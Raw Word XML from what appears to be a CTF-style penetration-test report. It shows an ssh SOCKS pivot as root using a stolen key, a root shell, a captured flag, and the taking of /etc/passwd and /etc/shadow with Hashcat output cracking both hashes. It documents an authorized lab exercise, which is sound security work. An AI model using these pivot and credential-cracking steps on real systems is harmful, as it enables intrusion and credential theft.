            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)-[~/Desktop/Final]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406D75E8" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">└─$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -D 127.0.0.1:31337 root@10.10.0.66 -p 443 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ext-Box/keys/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42510E67" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">          Welcome to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AA25AC3" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0180C069" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ███╗   ██╗██████╗ ███╗   ██╗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43624041" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ████╗  ██║██╔══██╗████╗  ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B47DBBA" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██╔██╗ ██║██████╔╝██╔██╗ ██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC532E7" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██║╚██╗██║██╔══██╗██║╚██╗██║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3EBAEE" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ██║ ╚████║██████╔╝██║ ╚████║</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="779635C4" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ╚═╝  ╚═══╝╚═════╝ ╚═╝  ╚═══╝</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5899A367" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>**Near-Earth Broadcast Network**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191E825C" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  *Someone is Always Watching*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="427BB207" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E698FA3" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B81291" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Penetration testing with permission only!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AAD20E9" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Last login: Sun </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apr  4</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21:45:09 2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED47B7C" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1892332B" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1219140E" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oot Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28444071" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB7EA3" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">With root access, the assessment team was able to access </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37B66F" w14:textId="16709807" w:rsidR="00343A40" w:rsidRPr="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="145C4023" wp14:editId="1162C3EB">
            <wp:extent cx="5943600" cy="3285490"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="1230908065"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8065" name="Picture 13"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w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36474F" w14:textId="0E6614C6" w:rsidR="00343A40" w:rsidRDefault="00343A40">
      <w:r>
        <w:t xml:space="preserve">They also downloaded the </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files. The assessment team proceeded to crack the stored hashes for both the </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user accounts using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00343A40" w14:paraId="0D5CF38B" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6A6F0DD6" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Session..........: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4172ABC6" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Status...........: Cracked</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6734AD62" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Hash.Mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>........: 1800 (sha512crypt $6$, SHA512 (Unix))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEC7C5D" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Hash.Target</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">......: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>shadow.hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0D6BEDFB" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Time.Started</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>.....</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>: Sun Apr 30 10:50:40 2023 (1 min, 17 secs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009562C5" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Time.Estimated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>...: Sun Apr 30 10:51:57 2023 (0 secs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFAD5F6" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kernel.Feature</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>...: Pure Kernel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEF39A1" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Guess.Base</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.......: File (rockyou.txt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66828CDC" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Guess.Queue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>......: 1/1 (100.00%)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3962B6AE" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Speed.#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">1.........:   133.0 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/s (10.97ms) @ Accel:1024 Loops:256 Thr:32 Vec:1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B06F420" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Salts</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="74D02AF7" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Progress.........: 20414464/28688768 (71.16%)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710D4089" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Rejected.........: 0/20414464 (0.00%)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2471BCE2" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Restore.Point</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>....: 10190848/14344384 (71.04%)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A680058" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4864-5000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E20C6E" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Candidate.Engine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.: Device Generator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7503B757" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Candidates.#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">1....: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>alynethebest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -&gt; alisonodonnell1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A9D8D93" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Hardware.Mon.#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>1..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>: Temp: 65c Fan: 77% Util: 89% Core:1920MHz Mem:10501MHz Bus:16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794D1BBD" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E2E0B9C" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Started: Sun Apr 30 10:50:15 2023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B9FD28C" w14:textId="67803384" w:rsidR="00343A40" w:rsidRPr="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
